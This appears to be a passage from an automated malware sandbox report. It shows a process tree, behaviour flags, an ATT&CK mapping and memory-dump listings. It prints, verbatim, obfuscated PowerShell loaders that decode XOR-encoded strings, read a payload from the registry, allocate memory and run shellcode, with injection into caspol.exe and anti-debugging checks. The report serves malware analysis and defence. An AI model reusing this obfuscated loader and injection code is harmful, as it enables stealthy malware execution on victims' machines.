Ap'Fo8Bl4HaCRaFKeDLu2SnCSk9Sk8Sk0Ov9HlDMa8Dd0Gr8Re4apDPr6HeCBa1StDRe2SaFPaFChDLi6VaCTh1Ma8SuEBiEKi9TrCLoEOvDco6RaCfoFRhCUnBpoCKo5Fa8Bo8taFMeBSkEre9DiCAdEMeDSt4UnFNe0PaDUn4TrDRe2HoFMoDAk9DyAPe9GeAPaFDiAMiCAg5EpDAc2ToCSeFKo8MyCEm8Ga0Pa9St0LiDOm8Pr9Ta1Un9Yd0Tr9Fl0Re9Fr0Kr9Tr0Al9Sa0Da8DaCFl8Be0to9Su0BuDRe8Af9In3Sa9ba0mi9In0Te9Pe0Ad8FiCOd8Un0mo9Ho0TrDRa8Af9Ap4Un8Gu9Be'De;MoNUdbtiepodDyeDesfo9To Be`$NaUStnTacrooUsmDvmPioStngenBaeCasMisCh8Co;Ca`$PaTDirSkeBodOsvBatSaeNodKaeFolAdeCanuneSu=Pa(JaGCeeRitDr-UnIOrtUneFlmCoPBerMioEfpOmeHerRetmeyOb Ta-slPLuaOrtBrhEn Re'InHStKPeCDwUTi:Tr\EntStoJumAbmTieKuludfOriHenAmgLoeOprMirBeeTagSplkueLineu\OuNFoiGacKioSttAliAfnCriMizAreTadSa'Br)Ta.BlPReoCalColSluTixIn;Nu`$riUAmnHucPhoLimTemLaoDinManMieSksQusUn9Be Ra=St FlHRiTHaBko Sm'Si8Do4KiFbe5StCFoEStCaf3HeCYiFslCMaDLaCPlDReCPaFEnCudEAnCChEHaCDi5SuDBl3ChDvi3Kl8Af0Om9NeDVa8Un0BaFDoBskFDy3PrDPr9afDOv3ToDen4LoCCy5SoCTrDWi8IsEShEVe3UnCSsFchCreESpDBe6InCbr5SyDPe2StDRe4ScFSaDSk9PiABo9TaAJaEFr6JoDAs2BaCEjFArCwoDAkELa2ZeCRn1AlDGe3PrCNo5De9Ti6To9Gl4ReFAc3PaDDo4LoDAs2MeCSo9FeCkrEVaCCu7Va8Au8re8su4GeFFo4CaDNa2EmCGa5SoCLi4FiDNv6skDOk4ReCCh5SnCNo4OnCSt5UnCopCWaCRu5KoCPrEMoCdu5Ja8Al9Se'Ta;SpNRubMeeMidUneCesSe9Dr Ko`$RoUBanImcGeoAmmLimHyoSinDenIneResStsDu9We;nu`$SjTSjrOveIndOvvMutSeeSpdBoeBrlSueVinpreGr0Ur Pl=Bo drHAnTKoBBa St'ElFFlBFeFMa3DaDre9MeDRe3AsDun4ArCil5DiCTiDUn8ReESuFYa2AfDPs5faCHaEBeDAn4DeCSd9InCDaDEtCBi5Fr8TiEViEHk9DeCApEboDSn4StCPi5UnDDo2KrCSvFEpDbe0weFMi3BoCSi5UnDUn2VaDOv6AlCko9MuCBr3KuCLa5IsDne3Un8ldEArENeDBaCGe1JoDMi2OvDHy3geCTh8CoCAt1DiCTeCLoFAlDRe9TaAVi9LoAprEAn3BuCVaFInDLn0SiDFl9Fu8Co8Re8Sk4MeFTr5PeCReEPiCPy3BiCCoFSnCSkDReCorDChCTiFPrCNuEAfCIlENoCGl5meDCi3KoDgr3Ge8PrCfe8De0In9Su0Wa8EqCRa8Le0Po8Sk0Un8Ha4ToFmi3ToDTe4UnCEk1KjDPr4GiCGrFNoCMa9LiCOpCAf9Ty3Un8NaCRu8Un0La9Ba3Ab9An6Re9Bu2No8Tu9Ad'he;HoNTebdieskdGeeAfsLa9Ku Ry`$CrTStrSkeSadHevSptPreBldMaeBilSeeNenIleHa0Mi;So`$KlsbriInzNoeAf=Sa`$arUStnKjcOcoBemEkmLaoPanTynUdeFisInsPa.SacPiodiuMenAdtes-Af3Ma6De2ar;In`$FlTNirReeRedRevAutTrePhdPyeSelAmeBanMoeLe1pl Uf=Ct NrHVoTCoBUd Fo'FeFSoBAbFSp3SmDOv9liDIn3ObDSm4KaCTh5ErCOvDOm8VeEAbFUn2MyDba5SyCUnEMeDLa4HeCTo9FoCAfDLeCBr5Af8UdEbiEDa9blCUdEHuDEn4SmCMi5PeDNo2BiCDaFArDIm0OvFOp3MoCud5voDFl2FoDmo6PsCUv9AlCUd3StCKe5BrDTo3Hu8CoEUnEMaDIlCin1HoDAc2AnDJa3TeCfo8NaCBe1VeChoCDuFEmDSr9SiASa9ZoARaELa3SaCBeFStDSo0AqDSc9Un8Fa8Gl8Ov4enFLi5ScCLeEmoCFe3PaCGoFAeCAlDsuCRuDDiCBlFTeCEpESoCflETiCsu5YvDSu3coDHe3Pl8UnCji8Te0No9fe3To9Lo6Fo9As2sh8OrCba8Kr0Di8Ki4PoCpiFFyDIn2unCKv9Pr8IlCKo8sp0Da8Le4TiDFo3KuCSa9LoDCrALyCLa5fr8Me9Fa'dr;InNImbEneKodSkeresLl9Sk Dv`$TiTForPrebodLivHutDyeSedBaeBllKoeVinUneGo1Kn;Ud`$skTSarSkeDidflvPatBleUddToegelNoeKanHveEd2Dr Do=Ta UnHInTLiBTe Fr'Co8Su4PrDBi6WhCor1GuDHo2UnFBeFClDBl2PlDIr5ShCBaEAcCGeDTrCTe5Di8Va0Ls9TwDTr8Ro0SeFEkBStFVi3SyDFu9TeDBi3SkDNu4ovCHe5FoCMiDud8ChESiFIn2UbDBr5RaCAnELaDAr4hoCCr9ToCUkDPoCSm5Ur8AbEGrESt9HeCAvEDiDTe4BlCKl5UaDda2diCArFAnDde0ReFFu3jeCEx5BeDLa2KaDAc6ReCFr9SyCMa3beCKe5CiDAf3Re8RaEAfEBlDAnCPo1BeDGa2ViDGr3AfCSa8VoCSk1CoCAfCCyFFiDOp9RoAAf9SaAMoECo7HjCUd5VaDHy4EnEky4LeCBo5raCEpCcaCun5SuCGr7glCho1BiDbu4SyCEn5FyEin6BrCAnFKrDBr2PrEDi6GuDFi5InCOvEMaCBi3ReDRu4DaCKo9LaCNeFCrCpaEEuFSt0SoCMuFReCNu9doCHiEDiDMo4GaCHi5TaDUn2Sv8Si8Sk8Ty4ExFAt3SyDFi4MuCPe1SpDVe4ThCFiFGnCId9InCOsCFr9Bu3Ma8BrCUn8Be0Pr8Kr8StELa7peEBe4HaFTe4Ag8Ve0BrERe0Kl8Bi8BoFPrBPoEMa9BeCSmEUdDSy4VaFSi0HiDKa4ThDUn2RaFBiDOm8UnCRaFDrBUtERo9LeCThEetDSu4DeFSt0ImDSu4meDga2ScFApDOu8Ko9ic8ti0Ga8Ag8SnFCoBNoFMi6ChCUsFBlCNo9ReCMo4KoFFrDGl8St9Di8Re9pa8He9Se'Uf;MaNPebCoeMydAmePusWa9Qu Ud`$SoTTrrPyeRodSpvDitSueSudBjeBllreetinReeBe2pi;Ce`$FoTTarseeScdNevVitCaeUndImeColDieAnnDoeGu3Ko op=ra GyHBrTIrBCr fl'Co8Fo4RuDTr6EfCHa1AfDMu2frFElFStDTo2SuDPe5UnCUdERoCLiDKuCCh5Ac8WeETaEAb9StCHuEUnDSp6ApCMeFFoCMyBEtCan5Bl8Pi8Ac8Sk4FaCEsFImDFo2TaCCy9No8EpCTr8Lo4SeDKi6CoCSk1SdDTh2BrFJeFOuCBrEOrDCh4Fi8Sv9Bi'Ba;StNSkbFleSvdUneQusDe9un Ba`$BjTFirSteBudStvNitLneendSneLilHeeOrnGream3Ra#St;""";;Function Tredvtedelene9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Bravaders = $Bravaders + $HS.Substring($i, 1); } $Bravaders;}$trresnors0 = Tredvtedelene9 'HiIElESeXTi ';$trresnors1= Tredvtedelene9 $Pigs;if([IntPtr]::size -eq 8){ start-job { param($a) powershell $a } -RunAs32 -Argument $trresnors1 | wait-job | Receive-Job;}else{ & ($trresnors0) $trresnors1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1940

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 160); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Yndighedens0=HTB 'F3D9D3D4C5CD8EC4CCCC';$Yndighedens1=HTB 'EDC9C3D2CFD3CFC6D48EF7C9CE93928EF5CED3C1C6C5EEC1D4C9D6C5EDC5D4C8CFC4D3';$Yndighedens2=HTB 'E7C5D4F0D2CFC3E1C4C4D2C5D3D3';$Yndighedens3=HTB 'F3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EE8C1CEC4CCC5F2C5C6';$Yndighedens4=HTB 'D3D4D2C9CEC7';$Yndighedens5=HTB 'E7C5D4EDCFC4D5CCC5E8C1CEC4CCC5';$Yndighedens6=HTB 'F2F4F3D0C5C3C9C1CCEEC1CDC58C80E8C9C4C5E2D9F3C9C78C80F0D5C2CCC9C3';$Yndighedens7=HTB 'F2D5CED4C9CDC58C80EDC1CEC1C7C5C4';$Yndighedens8=HTB 'F2C5C6CCC5C3D4C5C4E4C5CCC5C7C1D4C5';$Yndighedens9=HTB 'E9CEEDC5CDCFD2D9EDCFC4D5CCC5';$Nbedes0=HTB 'EDD9E4C5CCC5C7C1D4C5F4D9D0C5';$Nbedes1=HTB 'E3CCC1D3D38C80F0D5C2CCC9C38C80F3C5C1CCC5C48C80E1CED3C9E3CCC1D3D38C80E1D5D4CFE3CCC1D3D3';$Nbedes2=HTB 'E9CED6CFCBC5';$Nbedes3=HTB 'F0D5C2CCC9C38C80E8C9C4C5E2D9F3C9C78C80EEC5D7F3CCCFD48C80F6C9D2D4D5C1CC';$Nbedes4=HTB 'F6C9D2D4D5C1CCE1CCCCCFC3';$Nbedes5=HTB 'CED4C4CCCC';$Nbedes6=HTB 'EED4F0D2CFD4C5C3D4F6C9D2D4D5C1CCEDC5CDCFD2D9';$Nbedes7=HTB 'E9E5F8';$Nbedes8=HTB 'FC';Set-Alias -name Nbedes9 -value $Nbedes7;function fkp {Param ($v_m, $v_p) ;$Uncommonness0 =HTB '84D6D5CECD809D8088FBE1D0D0E4CFCDC1C9CEFD9A9AE3D5D2D2C5CED4E4CFCDC1C9CE8EE7C5D4E1D3D3C5CDC2CCC9C5D3888980DC80F7C8C5D2C58DEFC2CAC5C3D480DB8084FF8EE7CCCFC2C1CCE1D3D3C5CDC2CCD9E3C1C3C8C5808DE1CEC48084FF8EECCFC3C1D4C9CFCE8EF3D0CCC9D48884EEC2C5C4C5D39889FB8D91FD8EE5D1D5C1CCD38884F9CEC4C9C7C8C5C4C5CED3908980DD898EE7C5D4F4D9D0C58884F9CEC4C9C7C8C5C4C5CED39189';Nbedes9 $Uncommonness0;$Uncommonness5 = HTB '84D6C1D2FFC7D0C1809D8084D6D5CECD8EE7C5D4EDC5D4C8CFC48884F9CEC4C9C7C8C5C4C5CED3928C80FBF4D9D0C5FBFDFD80E08884F9CEC4C9C7C8C5C4C5CED3938C8084F9CEC4C9C7C8C5C4C5CED3948989';Nbedes9 $Uncommonness5;$Uncommonness1 = HTB 'D2C5D4D5D2CE8084D6C1D2FFC7D0C18EE9CED6CFCBC58884CED5CCCC8C80E088FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EE8C1CEC4CCC5F2C5C6FD88EEC5D78DEFC2CAC5C3D480F3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EE8C1CEC4CCC5F2C5C68888EEC5D78DEFC2CAC5C3D480E9CED4F0D4D2898C808884D6D5CECD8EE7C5D4EDC5D4C8CFC48884F9CEC4C9C7C8C5C4C5CED39589898EE9CED6CFCBC58884CED5CCCC8C80E08884D6FFCD898989898C8084D6FFD08989';Nbedes9 $Uncommonness1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Uncommonness2 = HTB '84F6F4E2809D80FBE1D0D0E4CFCDC1C9CEFD9A9AE3D5D2D2C5CED4E4CFCDC1C9CE8EE4C5C6C9CEC5E4D9CEC1CDC9C3E1D3D3C5CDC2CCD98888EEC5D78DEFC2CAC5C3D480F3D9D3D4C5CD8EF2C5C6CCC5C3D4C9CFCE8EE1D3D3C5CDC2CCD9EEC1CDC58884F9CEC4C9C7C8C5C4C5CED39889898C80FBF3D9D3D4C5CD8EF2C5C6CCC5C3D4C9CFCE8EE5CDC9D48EE1D3D3C5CDC2CCD9E2D5C9CCC4C5D2E1C3C3C5D3D3FD9A9AF2D5CE898EE4C5C6C9CEC5E4D9CEC1CDC9C3EDCFC4D5CCC58884F9CEC4C9C7C8C5C4C5CED3998C8084C6C1CCD3C5898EE4C5C6C9CEC5F4D9D0C58884EEC2C5C4C5D3908C8084EEC2C5C4C5D3918C80FBF3D9D3D4C5CD8EEDD5CCD4C9C3C1D3D4E4C5CCC5C7C1D4C5FD89';Nbedes9 $Uncommonness2;$Uncommonness3 = HTB '84F6F4E28EE4C5C6C9CEC5E3CFCED3D4D2D5C3D4CFD28884F9CEC4C9C7C8C5C4C5CED3968C80FBF3D9D3D4C5CD8EF2C5C6CCC5C3D4C9CFCE8EE3C1CCCCC9CEC7E3CFCED6C5CED4C9CFCED3FD9A9AF3D4C1CEC4C1D2C48C8084D6C1D2FFD0C1D2C1CDC5D4C5D2D3898EF3C5D4E9CDD0CCC5CDC5CED4C1D4C9CFCEE6CCC1C7D38884F9CEC4C9C7C8C5C4C5CED39789';Nbedes9 $Uncommonness3;$Uncommonness4 = HTB '84F6F4E28EE4C5C6C9CEC5EDC5D4C8CFC48884EEC2C5C4C5D3928C8084EEC2C5C4C5D3938C8084D6D2D48C8084D6C1D2FFD0C1D2C1CDC5D4C5D2D3898EF3C5D4E9CDD0CCC5CDC5CED4C1D4C9CFCEE6CCC1C7D38884F9CEC4C9C7C8C5C4C5CED39789';Nbedes9 $Uncommonness4;$Uncommonness5 = HTB 'D2C5D4D5D2CE8084F6F4E28EE3D2C5C1D4C5F4D9D0C58889';Nbedes9 $Uncommonness5 ;}$kk = HTB 'CBC5D2CEC5CC9392';$Uncommonness6 = HTB '84D6C1D2FFD6C1809D80FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EEDC1D2D3C8C1CCFD9A9AE7C5D4E4C5CCC5C7C1D4C5E6CFD2E6D5CEC3D4C9CFCEF0CFC9CED4C5D28888C6CBD08084CBCB8084EEC2C5C4C5D394898C8088E7E4F480E088FBE9CED4F0D4D2FD8C80FBF5E9CED49392FD8C80FBF5E9CED49392FD8C80FBF5E9CED49392FD898088FBE9CED4F0D4D2FD898989';Nbedes9 $Uncommonness6;$var_nt = fkp $Nbedes5 $Nbedes6;$Uncommonness7 = HTB '84F3D4C1D4CFC9CC93809D8084D6C1D2FFD6C18EE9CED6CFCBC588FBE9CED4F0D4D2FD9A9AFAC5D2CF8C809396928C8090D8939090908C8090D8949089';Nbedes9 $Uncommonness7;$Uncommonness8 = HTB '84CFD2C9809D8084D6C1D2FFD6C18EE9CED6CFCBC588FBE9CED4F0D4D2FD9A9AFAC5D2CF8C8090D89190909090908C8090D8939090908C8090D89489';Nbedes9 $Uncommonness8;$Tredvtedelene=(Get-ItemProperty -Path 'HKCU:\tommelfingerreglen\Nicotinized').Pollux;$Uncommonness9 = HTB '84F5CEC3CFCDCDCFCECEC5D3D3809D80FBF3D9D3D4C5CD8EE3CFCED6C5D2D4FD9A9AE6D2CFCDE2C1D3C59694F3D4D2C9CEC78884F4D2C5C4D6D4C5C4C5CCC5CEC589';Nbedes9 $Uncommonness9;$Tredvtedelene0 = HTB 'FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EEDC1D2D3C8C1CCFD9A9AE3CFD0D98884F5CEC3CFCDCDCFCECEC5D3D38C80908C808084F3D4C1D4CFC9CC938C8093969289';Nbedes9 $Tredvtedelene0;$size=$Uncommonness.count-362;$Tredvtedelene1 = HTB 'FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EEDC1D2D3C8C1CCFD9A9AE3CFD0D98884F5CEC3CFCDCDCFCECEC5D3D38C809396928C8084CFD2C98C8084D3C9DAC589';Nbedes9 $Tredvtedelene1;$Tredvtedelene2 = HTB '84D6C1D2FFD2D5CECDC5809D80FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EEDC1D2D3C8C1CCFD9A9AE7C5D4E4C5CCC5C7C1D4C5E6CFD2E6D5CEC3D4C9CFCEF0CFC9CED4C5D28884F3D4C1D4CFC9CC938C8088E7E4F480E088FBE9CED4F0D4D2FD8CFBE9CED4F0D4D2FD898088FBF6CFC9C4FD898989';Nbedes9 $Tredvtedelene2;$Tredvtedelene3 = HTB '84D6C1D2FFD2D5CECDC58EE9CED6CFCBC58884CFD2C98C84D6C1D2FFCED489';Nbedes9 $Tredvtedelene3#"
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:876

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
5⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1384

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
cdc3421a4fb6b5e389eeb1b53318b22e

SHA1
38479a8b05f390f00f33ff2c75e4f716d2b5d24f

SHA256
95e61c5201323f6d8c435e0b6b53abf519b3bae6bd9e8fc39db481152ef65064

SHA512
318ed2793a3b9efc796ee131cfccf7d06d52588d06a704761c18ef0dcee87c5987a62243fd373bb0923ab02c51ab6c6102a09066199c322a378c24a0ede1e127

Download Submit
memory/876-75-0x0000000077A30000-0x0000000077BB0000-memory.dmp

Filesize
1.5MB

Download
memory/876-71-0x0000000073940000-0x0000000073EEB000-memory.dmp

Filesize
5.7MB

Download
memory/876-67-0x0000000073940000-0x0000000073EEB000-memory.dmp

Filesize
5.7MB

Download
memory/876-68-0x0000000005BB0000-0x0000000005CB0000-memory.dmp

Filesize
1024KB

Download
memory/876-80-0x0000000077A30000-0x0000000077BB0000-memory.dmp

Filesize
1.5MB

Download
memory/876-77-0x0000000077A30000-0x0000000077BB0000-memory.dmp

Filesize
1.5MB

Download
memory/876-74-0x0000000077850000-0x00000000779F9000-memory.dmp

Filesize
1.7MB

Download
memory/876-72-0x0000000005BB0000-0x0000000005CB0000-memory.dmp

Filesize
1024KB

Download
memory/876-64-0x0000000000000000-mapping.dmp

Download
memory/972-62-0x0000000076261000-0x0000000076263000-memory.dmp

Filesize
8KB

Download
memory/972-63-0x0000000073940000-0x0000000073EEB000-memory.dmp

Filesize
5.7MB

Download
memory/972-60-0x0000000000000000-mapping.dmp

Download
memory/972-70-0x0000000073940000-0x0000000073EEB000-memory.dmp

Filesize
5.7MB

Download
memory/1208-54-0x000007FEFC0D1000-0x000007FEFC0D3000-memory.dmp

Filesize
8KB

Download
memory/1384-78-0x00000000002A768E-mapping.dmp

Download
memory/1384-79-0x00000000002B0000-0x00000000003B0000-memory.dmp

Filesize
1024KB

Download
memory/1384-84-0x0000000077850000-0x00000000779F9000-memory.dmp

Filesize
1.7MB

Download
memory/1940-69-0x000000000255B000-0x000000000257A000-memory.dmp

Filesize
124KB

Download
memory/1940-57-0x000007FEF46F0000-0x000007FEF5113000-memory.dmp

Filesize
10.1MB

Download
memory/1940-55-0x0000000000000000-mapping.dmp

Download
memory/1940-61-0x000000000255B000-0x000000000257A000-memory.dmp

Filesize
124KB

Download
memory/1940-58-0x0000000002554000-0x0000000002557000-memory.dmp

Filesize
12KB

Download
memory/1940-59-0x000007FEF3B90000-0x000007FEF46ED000-memory.dmp

Filesize
11.4MB

Download

Analysis

Sharing